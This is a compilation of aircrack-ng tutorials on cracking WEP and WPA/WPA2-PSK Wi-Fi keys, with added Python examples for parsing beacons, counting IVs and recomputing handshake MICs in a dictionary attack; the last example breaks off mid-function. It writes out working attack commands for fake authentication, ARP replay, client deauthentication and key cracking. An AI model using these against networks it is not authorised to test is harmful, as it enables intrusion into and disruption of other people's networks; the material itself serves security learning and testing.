Aircrack-ng Official Documentation

################################################################
Tutorial: Getting Started

Version: 1.01 September 25, 2009
By: darkAudax
Introduction

Many people ask "How do I get started?". This tutorial is intended to answer that question.

It is not intended to be a detailed How To tutorial, rather it is a road map to get you from where you are to the desired destination of using aircrack-ng. Once you get going, there is an abundance of materials on the wiki describing the tools in great detail and tutorials for various tasks.

This tutorial is focused on Linux. Yes, I realize that Linux is a hurdle for many people. Unfortunately Microsoft Windows simply does a poor job of supporting the aircrack-ng suite, primarily because of the proprietary nature of the operating system and of the wireless card drivers. See Tutorial: Aircrack-ng Suite under Windows for Dummies for more details. Bottom line: don't use the aircrack-ng suite under Windows. There is little or no support for it.

The basic process consists of three steps:

    Determine the chipset in your wireless card
    Determine which of the three options you will use to run the aircrack-ng suite
    Get started using the aircrack-ng suite

The first step of determining the wireless card chipset is covered in the Determining the Wireless Card Chipset section below.

Next, you need to decide which method you will use to run the aircrack-ng suite. The three options are:

    Linux distribution of your choice plus the aircrack-ng suite
    Live CD which contains a version of the aircrack-ng suite
    VMWare image which contains a version of the aircrack-ng suite

There is a section below describing each option in more detail plus the advantages and disadvantages of each.

Finally, once you have aircrack-ng running, follow the Using Aircrack-ng Suite section below.

If you have problems, see the Resources section.

Please send any constructive feedback, positive or negative.

Have fun!
Determining the Wireless Card Chipset

The first step is determining which chipset your current wireless card contains. Chipsets are the electronics on a card which allow the card to function wirelessly. Not all chipsets are supported by aircrack-ng. Even if the chipset is supported, some of the functions may not work properly.

To determine the chipset of your card, follow Tutorial: Is My Wireless Card Compatible?. You need to know what chipset your card has in order to determine if it is supported by aircrack-ng.

Once you have determined the chipset in your wireless card, use Compatible Cards to determine if the chipset is compatible with the aircrack-ng suite. If it is, then it tells you which software drivers are required for your particular card.

If you don't have an existing wireless card or are considering purchasing another one, this same page has comments on various chipsets and cards which are known to work with aircrack-ng.
Linux Distribution of Your Choice

There are a large number of linux distributions available. They should all properly support the aircrack-ng suite.

Once you have your favorite Linux distribution installed and functioning well, it is time to patch your wireless card driver. In the previous step you determined the chipset in your wireless card. Look up which driver is required for that particular chipset on Compatible Cards.

Then follow the installation instructions on the Installing Drivers page specific to your chipset. There is troubleshooting information on both this page and the individual driver pages.

Install the aircrack-ng suite using these instructions.

Once your wireless card is working well, jump to the Using Aircrack-ng Suite section below.

Advantages

    aircrack-ng is almost certain to work
    Provides the ability to run the latest versions of aircrack-ng and any wireless driver
    Provides the most flexibility

Disadvantages

    Requires much deeper knowledge of linux

Live CD

A live CD is a complete running linux distribution which you download and burn onto a CD. You then boot from this CD. Once booted and logged in, you are able to run the aircrack-ng suite with your wireless card. Knowing the chipset of your wireless card (determined in the first step), select a live CD which contains the patched version of the driver for your particular card. This is a key requirement. Needless to say, the live CD must also contain a copy of the aircrack-ng suite.

Here is a list of live CDs that are known to include the aircrack-ng suite.

Once you have booted from the CD and your wireless card is working well, jump to the Using Aircrack-ng Suite section below.

Advantages

    Works with any host operating system.
    No knowledge needed to get aircrack-ng and the drivers working.
    Very portable.

Disadvantages

    Old version of aircrack-ng is included. May contain bugs and/or be missing features.
    Old versions of drivers are included. May contain bugs and/or be missing features.

VMWare Image

VMWare is a commercial virtualization product. Virtualization means running a virtual computer instance under a host operating system; VMWare supports a variety of host operating systems.

Here are the currently available VMWare virtual machines. Here are the installation instructions.

Once you have installed and booted from the VMWare image and your wireless card is working well, jump to the Using Aircrack-ng Suite section below.

Advantages

    No knowledge needed to get aircrack-ng and the drivers working.
    Very portable.

Disadvantages

    Works with a limited set of host operating systems.
    Only USB devices are supported.
    Old version of aircrack-ng is included. May contain bugs and/or be missing features. (but can be updated with some knowledge)
    Old versions of drivers are included. May contain bugs and/or be missing features. (but can be updated with some knowledge)

Using the Aircrack-ng Suite

You should always start by confirming that your wireless card can inject packets. This can be done by using the injection test.

Then start by following the Simple WEP Crack Tutorial.

Once you have mastered that technique, you can follow the other tutorials to learn aircrack-ng in more detail.

################################################################
Aircrack-ng Newbie Guide for Linux

Idea and initial work: ASPj
Additions by: a number of good souls
Last updated: Nov 21, 2018

This tutorial will give you the basics to get started using the aircrack-ng suite. It is impossible to provide every piece of information you need and cover every scenario. So be prepared to do some homework and research on your own. The Forum and the Wiki have lots of supplementary tutorials and information.

Although it does not cover all the steps from start to finish like this tutorial, the Simple WEP Crack tutorial covers the actual aircrack-ng steps in much more detail.
Setting up Hardware, Installing Aircrack-ng

The first step in getting aircrack-ng working properly on your Linux system is patching and installing the proper driver for your wireless card. Many cards work with multiple drivers, some of which provide the necessary features for using aircrack-ng, and some of which do not.

Needless to say, you need a wireless card which is compatible with the aircrack-ng suite: hardware which is fully supported and can inject packets. With such a card, a WEP-protected access point can usually be cracked in under an hour.

To determine which category your card belongs to, see the hardware compatibility page. Read Tutorial: Is My Wireless Card Compatible? if you don't know where to look in this table. Even if you already know your card, it does not hurt to read that tutorial to build your knowledge and confirm your card's attributes.

First, you need to know which chipset is used in your wireless card and which driver you need for it. You will have determined this using the information in the previous paragraph. The drivers section will tell you which drivers you need.
Aircrack-ng installation

Get the latest copy of aircrack-ng from the homepage, use our packages or use a penetration testing distribution such as Kali Linux or Pentoo where Aircrack-ng is already installed and up to date.

To install aircrack-ng, refer to the documentation on the installation page.
IEEE 802.11 basics

Ok, now everything is ready, time to make a pit stop before the action finally starts and learn something about how wireless networks work.

The following chapter is very important if something doesn't work as expected. Knowing what is going on helps you find the problem, or at least helps you describe it to someone who can help you. This is a little bit scientific and maybe you feel like skipping it. However, a little knowledge is necessary to crack wireless networks, because it is more than just typing one command and letting aircrack-ng do the rest.
How a wireless network is found

This is a short introduction to managed networks, the ones working with Access Points (AP). Every AP sends out about 10 so-called beacon frames a second. These frames contain the following information:

    Name of the network (ESSID)
    If encryption is used (and what encryption is used; pay attention, that may not be always true just because the AP advertises it)
    What MBit data rates are supported
    Which channel the network is on

This information is then shown in your tool that connects to this network. It is shown when you let your card scan for networks with iwlist <interface> scan and when you run airodump-ng.

Every AP has a MAC address (48 bits, written as six pairs of hexadecimal digits). It looks like 00:01:23:4A:BC:DE. Every network device has such an address and network devices address each other with it, so it is basically a unique name. Manufacturer-assigned MAC addresses are meant to be globally unique, but the address a card actually transmits can be changed in software; the -h option of aireplay-ng used later in this tutorial relies on exactly that.
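To make the beacon contents concrete, here is an added Python example (not code from the aircrack-ng project) that builds a beacon frame by hand and parses out the fields airodump-ng displays for an access point. The BSSID, network name and RSN information element are constructed for this example; the header layout, capability bit and tag numbers are the ones defined by IEEE 802.11.

```python
"""Build and parse an IEEE 802.11 beacon frame (added example; constructed data)."""
import struct

# Tagged-parameter IDs defined by IEEE 802.11; only the ones this example reads.
TAG_SSID, TAG_RATES, TAG_DS_PARAM, TAG_RSN = 0, 1, 3, 48
CAP_PRIVACY = 0x0010            # capability bit set when the AP encrypts (WEP, WPA or WPA2)
BROADCAST = b"\xff" * 6

# Constructed RSN information element: WPA2 with CCMP and a pre-shared key (AKM suite type 2).
EXAMPLE_RSN_PSK = (b"\x01\x00" + b"\x00\x0f\xac\x04"              # version 1, group cipher CCMP
                   + b"\x01\x00" + b"\x00\x0f\xac\x04"            # one pairwise cipher: CCMP
                   + b"\x01\x00" + b"\x00\x0f\xac\x02"            # one AKM suite: PSK
                   + b"\x00\x00")                                 # RSN capabilities


def build_beacon(bssid, ssid, channel, privacy, rsn=None):
    """Return a minimal beacon frame: 24-byte management header + fixed fields + tagged IEs."""
    header = (b"\x80\x00"            # frame control: type management, subtype beacon
              + b"\x00\x00"          # duration
              + BROADCAST            # addr1: beacons go to everybody
              + bssid + bssid        # addr2 (transmitter) and addr3 (BSSID)
              + b"\x00\x00")         # sequence control
    capability = CAP_PRIVACY if privacy else 0
    body = struct.pack("<QHH", 0, 100, capability)   # timestamp, beacon interval 100 TU, capabilities
    body += bytes([TAG_SSID, len(ssid)]) + ssid.encode()
    # Supported rates in 500 kbit/s units, high bit = basic rate: 1, 2, 5.5, 11, 18, 24, 36, 54 Mbit/s
    rates = bytes([0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c])
    body += bytes([TAG_RATES, len(rates)]) + rates
    body += bytes([TAG_DS_PARAM, 1, channel])
    if rsn is not None:
        body += bytes([TAG_RSN, len(rsn)]) + rsn
    return header + body


def first_akm_suite_type(rsn):
    """Suite type byte of the first AKM suite in an RSN IE (2 = PSK, 1 = 802.1X)."""
    n_pairwise = struct.unpack_from("<H", rsn, 6)[0]
    akm_count_off = 8 + 4 * n_pairwise
    n_akm = struct.unpack_from("<H", rsn, akm_count_off)[0]
    return rsn[akm_count_off + 2 + 3] if n_akm else None


def parse_beacon(frame):
    """Extract what airodump-ng shows in its AP block: BSSID, ESSID, CH, MB and ENC."""
    if frame[0] != 0x80 or len(frame) < 36:
        raise ValueError("not a beacon frame")
    bssid = ":".join(f"{b:02X}" for b in frame[16:22])        # addr3
    _timestamp, interval_tu, capability = struct.unpack_from("<QHH", frame, 24)
    ies, pos = {}, 36
    while pos + 2 <= len(frame):                              # walk the tag/length/value list
        tag, length = frame[pos], frame[pos + 1]
        ies[tag] = frame[pos + 2:pos + 2 + length]
        pos += 2 + length
    essid = ies.get(TAG_SSID, b"").decode(errors="replace") or "<hidden>"
    rates = [(r & 0x7f) / 2 for r in ies.get(TAG_RATES, b"")]
    if not capability & CAP_PRIVACY:
        enc = "OPN"
    elif TAG_RSN in ies:
        enc = "WPA2-PSK" if first_akm_suite_type(ies[TAG_RSN]) == 2 else "WPA2"
    else:
        enc = "WEP?"    # privacy set but no RSN IE: WEP, or WPA1 (vendor IE, not parsed here)
    return {
        "bssid": bssid,
        "essid": essid,
        "ch": ies[TAG_DS_PARAM][0] if TAG_DS_PARAM in ies else None,
        "mb": max(rates) if rates else None,
        "enc": enc,
        "beacons_per_second": round(1000 / (interval_tu * 1.024), 1),   # 1 TU = 1.024 ms
    }


if __name__ == "__main__":
    frame = build_beacon(bytes.fromhex("000102030405"), "Practice", 11, True, EXAMPLE_RSN_PSK)
    print(parse_beacon(frame))
```

The beacon interval of 100 time units (102.4 ms) is where the "about 10 beacons a second" figure comes from, and the "WEP?" result for a privacy-enabled AP without an RSN element mirrors the ENC column described below: the beacon alone cannot distinguish WEP from WPA1 until data frames or the vendor-specific WPA element are examined.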
Connecting with a network

If you want to connect to a wireless network, there are some possibilities. In most cases, Open System Authentication is used. (Optional: If you want to learn more about authentication, check this out.)

Open System Authentication:

    Ask the AP for authentication.
    The AP answers: OK, you are authenticated.
    Ask the AP for association
    The AP answers: OK, you are now connected.


This is the simplest case, BUT there can be problems if you are not authorized to connect:

    WPA/WPA2 is in use. Authentication and association themselves succeed, but the AP then expects an EAPOL four-way handshake, and without the pre-shared key it will deauthenticate you shortly afterwards.
    The Access Point has a list of allowed clients (MAC addresses) and lets no one else connect. This is called MAC filtering.
    The Access Point uses Shared Key Authentication, so you need to supply the correct WEP key to be able to connect. (See the How to do shared key fake authentication? tutorial for advanced techniques.)

Simple sniffing and cracking
Discovering Networks

The first thing to do is to look for a potential target. The aircrack-ng suite contains airodump-ng for this, but other programs like Kismet can be used too.

Prior to looking for networks, you must put your wireless card into what is called monitor mode. Monitor mode is a special mode that allows your computer to listen to every wireless packet. This monitor mode also allows you to optionally inject packets into a network. Injection will be covered later in this tutorial.

To put your wireless card into monitor mode using airmon-ng:

airmon-ng start wlan0

It will create another interface with mon appended to the name, so wlan0 becomes wlan0mon. To confirm it is in monitor mode, run iwconfig (or iw dev) and check the mode. If airmon-ng warns about processes that could interfere (typically NetworkManager or wpa_supplicant), stop them with airmon-ng check kill before continuing.

Then, start airodump-ng to look out for networks:

airodump-ng wlan0mon

If airodump-ng could connect to the WLAN device, you'll see a screen like this:

airodump-ng hops from channel to channel and shows all access points it can receive beacons from. Channels 1 to 14 are used for 802.11b and g (in the US only 1 to 11 are allowed; 1 to 13 in Europe with some special cases; 1 to 14 in Japan). 802.11a is in the 5 GHz band, where availability differs more between countries than on 2.4 GHz. In general, the known channels start at 36 (32 in some countries), run to 64 (68 in some countries), and then 96 to 165. Wikipedia has more details on channel availability. The Linux Central Regulatory Domain Agent allows or forbids transmissions on the different channels for your country; it needs to be set appropriately (iw reg get shows the current regulatory domain, iw reg set <country code> changes it).

The current channel is shown in the top left corner.

After a short time some APs and (hopefully) some associated clients will show up.

The upper data block shows the access points found:
BSSID 	The MAC address of the AP
RXQ	Receive quality: the percentage of frames successfully received over the last 10 seconds. Only shown when locked on a channel
PWR 	Signal strength. Some drivers don't report it
Beacons 	Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality
Data 	Number of data frames received
CH 	Channel the AP is operating on
MB 	Speed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture
ENC 	Encryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (don't know yet)
ESSID 	The network name. Sometimes hidden

The lower data block shows the clients found:
BSSID 	The MAC of the AP this client is associated to
STATION 	The MAC of the client itself
PWR 	Signal strength. Some drivers don't report it
Packets 	Number of data frames received
Probes 	Network names (ESSIDs) this client has probed

Now you should look out for a target network. It should have a client connected because cracking networks without a client is an advanced topic (See How to crack WEP with no clients). It should use WEP encryption and have a high signal strength. Maybe you can re-position your antenna to get a better signal. Often a few centimeters make a big difference in signal strength.

In the example above the network 00:01:02:03:04:05 would be the only possible target because it's the only one with an associated client. It also has a high signal strength, so it's a good target to practice on.
Sniffing IVs

Because of the channel hopping you won't capture all packets from your target net. So we want to listen just on one channel and additionally write all data to disk to be able to use it for cracking:

airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump wlan0mon

With the -c parameter you tune to a channel, and the parameter after -w is the prefix of the capture files written to disk. The --bssid option combined with the AP MAC address limits the capture to that one AP; it is only available in newer versions of airodump-ng.

Before being able to crack WEP you'll usually need between 40 000 and 85 000 different Initialization Vectors (IVs); these figures are for the PTW attack used by default, and the older FMS/KoreK statistics need far more. Every data packet contains an IV. IVs can be re-used, so the number of different IVs is usually a bit lower than the number of data packets captured.

So you'll have to wait and capture 40K to 85K of data packets (IVs). If the network is not busy it will take a very long time. Often you can speed it up a lot by using an active attack (=packet replay). See the next chapter.
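The IV bookkeeping described above, as an added Python example (not aircrack-ng code): it pulls the IV and key index out of WEP data frames the way airodump-ng does, counts total versus distinct IVs for one BSSID, flags the classic FMS weak IVs, and counts frames that look like encrypted ARP requests. The frames, addresses and IV values are constructed; the frame layout is the IEEE 802.11 one. The size-plus-broadcast rule for spotting an ARP request is this example's own assumption about how such packets can be recognized without decrypting them.

```python
"""Extract WEP IVs from 802.11 data frames and count them (added example; constructed frames)."""
from collections import Counter

FC_TYPE_DATA = 0x08          # frame control byte 0: type bits == data
FC_SUBTYPE_QOS = 0x80        # QoS data subtype: header carries an extra 2-byte QoS control field
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40
BROADCAST = b"\xff" * 6
# WEP body of an ARP request: 8 (LLC/SNAP) + 28 (ARP) + 4 (IV + key id) + 4 (ICV). Heuristic assumed
# here for recognising encrypted ARP requests: the plaintext is invisible, the size is not.
ARP_REQUEST_BODY_LEN = 44


def build_wep_frame(bssid, station, iv, key_index=0, payload_len=36, to_ds=True, dest=BROADCAST):
    """Constructed WEP data frame: 24-byte header, 3-byte IV, key-id byte, opaque payload, 4-byte ICV."""
    flags = FLAG_PROTECTED | (FLAG_TO_DS if to_ds else FLAG_FROM_DS)
    if to_ds:       # station -> AP: addr1 = BSSID, addr2 = station, addr3 = final destination
        addrs = bssid + station + dest
    else:           # AP -> station: addr1 = station, addr2 = BSSID, addr3 = original source (AP here)
        addrs = station + bssid + bssid
    header = bytes([FC_TYPE_DATA, flags]) + b"\x00\x00" + addrs + b"\x00\x00"
    body = bytes(iv) + bytes([key_index << 6]) + bytes(payload_len) + b"\x00" * 4
    return header + body


def wep_frames(frames):
    """Yield (bssid, iv, key_index, body_len, destination) for each protected data frame."""
    for f in frames:
        fc0, fc1 = f[0], f[1]
        if fc0 & 0x0c != FC_TYPE_DATA or not fc1 & FLAG_PROTECTED:
            continue                                     # beacons, ACKs, unencrypted data: no IV
        header_len = 26 if fc0 & FC_SUBTYPE_QOS else 24
        to_ds = bool(fc1 & FLAG_TO_DS)
        bssid = f[4:10] if to_ds else f[10:16]
        dest = f[16:22] if to_ds else f[4:10]
        iv = tuple(f[header_len:header_len + 3])
        key_index = f[header_len + 3] >> 6               # key id lives in the top two bits
        yield bssid, iv, key_index, len(f) - header_len, dest


def is_fms_weak(iv, key_bytes=13):
    """Classic FMS weak IV (A+3, 255, X) leaks key byte A; KoreK's attacks use further patterns."""
    return iv[1] == 0xFF and 3 <= iv[0] < 3 + key_bytes


def iv_stats(frames, bssid):
    """Counts airodump-ng reports for one BSSID (data frames, distinct IVs) plus a few extras."""
    ivs, key_ids, arp_like = [], Counter(), 0
    for b, iv, key_index, body_len, dest in wep_frames(frames):
        if b != bssid:                                   # like airodump-ng --bssid
            continue
        ivs.append(iv)
        key_ids[key_index] += 1
        if dest == BROADCAST and body_len == ARP_REQUEST_BODY_LEN:
            arp_like += 1
    distinct = set(ivs)
    return {
        "data_frames": len(ivs),
        "distinct_ivs": len(distinct),
        "reused_ivs": len(ivs) - len(distinct),
        "fms_weak_ivs": sum(1 for iv in distinct if is_fms_weak(iv)),
        "key_index_histogram": dict(key_ids),
        "arp_request_candidates": arp_like,
    }


def example_capture():
    """Constructed frames: target AP traffic with reused IVs, one frame from another AP, one beacon."""
    target, client = bytes.fromhex("000102030405"), bytes.fromhex("000405060708")
    other = bytes.fromhex("0a0b0c0d0e0f")
    ivs = [(0x10, 0x20, 0x30), (0x11, 0x20, 0x30), (0x10, 0x20, 0x30),   # third repeats the first
           (0x03, 0xFF, 0x07), (0x05, 0xFF, 0x2A), (0x05, 0xFF, 0x2A)]   # FMS-weak, one repeated
    frames = [build_wep_frame(target, client, iv, to_ds=(i % 2 == 0)) for i, iv in enumerate(ivs)]
    frames.append(build_wep_frame(other, client, (1, 2, 3), key_index=2, payload_len=100))
    frames.append(b"\x80\x00" + b"\x00" * 34)                            # a beacon: not a data frame
    return frames, target, other


if __name__ == "__main__":
    frames, target, other = example_capture()
    print(iv_stats(frames, target))
    print(iv_stats(frames, other))
```

Note the key index histogram: aircrack-ng's -i option filters on exactly this value, which matters when an AP rotates between several configured WEP keys.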
Cracking

If you've got enough IVs captured in one or more file, you can try to crack the WEP key:

aircrack-ng -b 00:01:02:03:04:05 dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets. You can use multiple files, just add all their names or you can use a wildcard such as dump*.cap.

For more information about aircrack-ng parameters, description of the output and usage see the manual.

The number of IVs you need to crack a key is not fixed. This is because some IVs are weaker and leak more information about the key than others. Usually these weak IVs are randomly mixed in between the stronger ones. So if you are lucky, you can crack a key with only 20 000 IVs. But often this is not enough and aircrack-ng will run a long time (up to a week or even longer with a high fudge factor) and then tell you the key could not be cracked. If you have more IVs, cracking can be done a lot faster and is usually done in a few minutes, or even seconds. Experience shows that 40 000 to 85 000 IVs is usually enough for cracking.

There are some more advanced APs out there that use an algorithm to filter out weak IVs. The result is either that you can't get more than n different IVs from the AP or that you'll need millions (like 5 to 7 million) to crack the key. Search in the Forum, there are some threads about cases like this and what to do.
Active attacks
Injection support

Many devices don't support injection, at least not without patched drivers, and some only support certain attacks. Take a look at the compatibility page, column aireplay. Sometimes this table is not up to date, so if you see a NO for your driver there, don't give up yet, but look at the driver homepage, the driver mailing list or our Forum. If you were able to successfully replay using a driver which is not listed as supported, don't hesitate to update the compatibility page table and add a link to a short howto. (To do this, request a wiki account on IRC.)

The first step is to make sure packet injection really works with your card and driver. The easiest way to test it is the injection test attack. Make sure to perform this test prior to proceeding. Your card must be able to successfully inject in order to perform the following steps.

You'll need the BSSID (AP MAC) and ESSID (network name) of an AP that does not do MAC filtering (e.g. your own) and must be in range of the AP.

Try to connect to your AP using aireplay-ng:

aireplay-ng --fakeauth 0 -e "your network ESSID" -a 00:01:02:03:04:05 wlan0mon

The value after -a is the BSSID of your AP.

If injection works you should see something like this:

12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)

If it does not work:

    double-check ESSID and BSSID
    make sure your AP has MAC filtering disabled
    test it against another AP
    make sure your driver is properly patched and supported
    Instead of 0, try 6000 -o 1 -q 10 (re-authenticate every 6000 seconds, send one packet per burst with -o 1, and send a keep-alive every 10 seconds with -q 10)

ARP replay

Now that we know that packet injection works, we can do something to massively speed up capturing IVs: ARP-request reinjection
The idea

ARP works (simplified) by broadcasting a query for an IP and the device that has this IP sends back an answer. Because WEP does not protect against replay, you can sniff a packet, send it out again and again and it is still valid. So you just have to capture and replay an ARP-request targeted at the AP to create lots of traffic (and sniff IVs).
The lazy way

First open a window with an airodump-ng sniffing for traffic (see above). aireplay-ng and airodump-ng can run together. Wait for a client to show up on the target network. Then start the attack:

aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 wlan0mon

-b specifies the target BSSID, -h the MAC of the connected client.

Now you have to wait for an ARP packet to arrive. Usually you'll have to wait for a few minutes (or look at the next chapter).

If you were successful, you'll see something like this:

Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

If you have to stop replaying, you don't have to wait for the next ARP packet to show up, but you can re-use the previously captured packet(s) with the -r <filename> option.

When using the ARP injection technique, you can use the PTW method to crack the WEP key. This dramatically reduces the number of data packets you need and also the time needed. You must capture the full packets in airodump-ng, meaning do not use the --ivs option when starting it. For aircrack-ng, use aircrack-ng -z <file name>; PTW is the default attack in version 1.x, so -z is only needed on older versions.

If the number of data packets received by airodump-ng sometimes stops increasing you maybe have to reduce the replay-rate. You do this with the -x <packets per second> option. I usually start out with 50 and reduce until packets are received continuously again. Better positioning of your antenna usually also helps.
The aggressive way

Most operating systems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect to capture an ARP-request. A side-effect is that you can sniff the ESSID and possibly a keystream during reconnection too. This comes in handy if the ESSID of your target is hidden, or if it uses shared-key authentication.

Keep your airodump-ng and aireplay-ng running. Open another window and run a deauthentication attack:

aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0mon

-a is the BSSID of the AP, -c the MAC of the targeted client.

Wait a few seconds and your ARP replay should start running.

Most clients try to reconnect automatically. But the risk that someone recognizes this attack, or at least that attention is drawn to what is happening on the WLAN, is higher than with other attacks. The attack works because deauthentication frames are not authenticated in WEP and plain WPA/WPA2 networks; an AP and client using 802.11w management frame protection discard forged ones.

################################################################

Aircrack-ng
Description

Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.

Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng. This part of the aircrack-ng suite determines the WEP key using two fundamental methods. The first method is via the PTW approach (Pyshkin, Tews, Weinmann). The default cracking method is PTW. This is done in two phases. In the first phase, aircrack-ng only uses ARP packets. If the key is not found, then it uses all the packets in the capture. Please remember that not all packets can be used for the PTW method. This Tutorial: Packets Supported for the PTW Attack page provides details. An important limitation is that the PTW attack currently can only crack 40 and 104 bit WEP keys. The main advantage of the PTW approach is that very few data packets are required to crack the WEP key.

The other, older method is the FMS/KoreK method. It incorporates various statistical attacks to discover the WEP key and uses these in combination with brute forcing. It requires more packets than PTW, but on the other hand it can sometimes recover the key when PTW fails.

Additionally, the program offers a dictionary method for determining the WEP key.

For cracking WPA/WPA2 pre-shared keys, only a dictionary method is used. A four-way handshake is required as input. For WPA handshakes, a full handshake is composed of four packets. However, aircrack-ng is able to work successfully with just 2 packets. EAPOL packets (2 and 3) or packets (3 and 4) are considered a full handshake.

SSE2, AVX, AVX2, and AVX512 support is included to dramatically speed up WPA/WPA2 key processing. With the exception of AVX512, all of these are built into aircrack-ng, which automatically selects the fastest one available for the CPU. For non-x86 CPUs, SIMD improvements are present as well.
Screenshot

LEGEND
1 = Keybyte
2 = Depth of current key search
3 = Byte the IVs leaked
4 = Votes indicating this is correct

How does it work?

The first method is the PTW method (Pyshkin, Tews, Weinmann). The PTW method is fully described in the paper found on this web site. In 2005, Andreas Klein presented another analysis of the RC4 stream cipher. Klein showed that there are more correlations between the RC4 keystream and the key than the ones found by Fluhrer, Mantin, and Shamir, and these can additionally be used to break WEP. The PTW method extends Klein's attack and optimizes it for use against WEP, building on the FMS-style statistics described in the following section. One particularly important constraint is that it works only with packets whose first plaintext bytes are predictable, which in practice means ARP request/reply packets first; other traffic can only be used in the cases listed on the Tutorial: Packets Supported for the PTW Attack page referenced above.

The second method is the FMS/Korek method which incorporates multiple techniques. The Techniques Papers on the links page lists many papers which describe these techniques in more detail and the mathematics behind them.

In this method, multiple techniques are combined to crack the WEP key:

    FMS ( Fluhrer, Mantin, Shamir) attacks - statistical techniques
    Korek attacks - statistical techniques
    Brute force

When using statistical techniques to crack a WEP key, each byte of the key is essentially handled individually. Using statistical mathematics, the probability that a certain byte in the key is correctly guessed goes up to as much as 15% when the right initialization vector (IV) is captured for a particular key byte. Essentially, certain IVs leak the secret WEP key for particular key bytes. This is the fundamental basis of the statistical techniques.

By using a series of statistical tests called the FMS and Korek attacks, votes are accumulated for likely keys for each key byte of the secret WEP key. Different attacks have a different number of votes associated with them since the probability of each attack yielding the right answer varies mathematically. The more votes a particular potential key value accumulates, the more likely it is to be correct. For each key byte, the screen shows the likely secret key and the number of votes it has accumulated so far. Needless to say, the secret key with the largest number of votes is most likely correct but is not guaranteed. Aircrack-ng will subsequently test the key to confirm it.

Looking at an example will hopefully make this clearer. In the screenshot above, you can see that at key byte 0 the byte 0xAE has collected some votes, 50 in this case. So, statistically, it is more likely that the key starts with AE than with 11 (which is second on the same line), which has fewer than half as many votes. That explains why the more data is available, the greater the chances that aircrack-ng will determine the secret WEP key.

However the statistical approach can only take you so far. The idea is to get into the ball park with statistics then use brute force to finish the job. Aircrack-ng uses brute force on likely keys to actually determine the secret WEP key.

This is where the fudge factor comes in. Basically the fudge factor tells aircrack-ng how broadly to brute force. It is like throwing a ball into a field and then telling somebody the ball is somewhere between 0 and 10 meters (0 and 30 feet) away, versus saying the ball is somewhere between 0 and 100 meters (0 and 300 feet) away. The 100 meter scenario will take a lot longer to search than the 10 meter one, but you are more likely to find the ball with the broader search. It is a trade-off between the length of time and the likelihood of finding the secret WEP key.

For example, if you tell aircrack-ng to use a fudge factor 2, it takes the votes of the most possible byte, and checks all other possibilities which are at least half as possible as this one on a brute force basis. The larger the fudge factor, the more possibilities aircrack-ng will try on a brute force basis. Keep in mind, that as the fudge factor gets larger, the number of secret keys to try goes up tremendously and consequently the elapsed time also increases. Therefore with more available data, the need to brute force, which is very CPU and time intensive, can be minimized.

In the end, it is all just simple mathematics and brute force!

For cracking WEP keys, a dictionary method is also included. For WEP, you may use either the statistical method described above or the dictionary method, not both at the same time. With the dictionary method, you first create a file with either ascii or hexadecimal keys. A single file can only contain one type, not a mix of both. This is then used as input to aircrack-ng and the program tests each key to determine if it is correct.

The techniques and the approach above do not work for WPA/WPA2 pre-shared keys. The only way to crack these pre-shared keys is via a dictionary attack. This capability is also included in aircrack-ng.

With pre-shared keys, the client and access point establish the keying material for their communication at the outset, when the client first associates with the access point, in a four-way handshake, and airodump-ng can capture this handshake. For each entry in a provided word list (dictionary), aircrack-ng derives the pairwise master key from the candidate passphrase and the ESSID, derives the pairwise transient key from it together with the MAC addresses and nonces seen in the handshake, and recomputes the message integrity code of the captured EAPOL frame. If the computed code matches the captured one, the pre-shared key has been successfully identified. (This is why the ESSID must be known, and why -e is required when it is hidden.)

It should be noted that this process is very computationally intensive, so in practice very long or unusual pre-shared keys are unlikely to be determined. A good quality word list will give you the best results. Another approach is to use a tool like John the Ripper to generate password guesses which are in turn fed into aircrack-ng.
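The per-word computation just described, as an added Python example (not aircrack-ng's code) using only the standard library: PBKDF2 to get the PMK, the 802.11i PRF to get the key confirmation key, and an HMAC over the EAPOL-Key frame to recompute the MIC. The handshake values (MAC addresses, nonces, message 2) are constructed by the example itself from a known passphrase, so it also shows why message 2 of 4 together with the ANonce from message 1 or 3 is all that is needed, and why the ESSID must be right.

```python
"""WPA/WPA2-PSK dictionary attack on a four-way handshake (added example; constructed capture)."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81          # EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
MIC_LEN = 16             # + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8) = 81


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes): the slow, per-word step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(pmk, label, data, length):
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(PMK, label || 0x00 || data || i), truncated."""
    out = b""
    for i in range((length + 19) // 20):
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:length]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """First 16 bytes of the PTK: the key confirmation key that authenticates the EAPOL messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]   # PRF-384 for CCMP; KCK same for TKIP


def eapol_mic(kck, eapol, wpa2=True):
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed. WPA2/CCMP (descriptor
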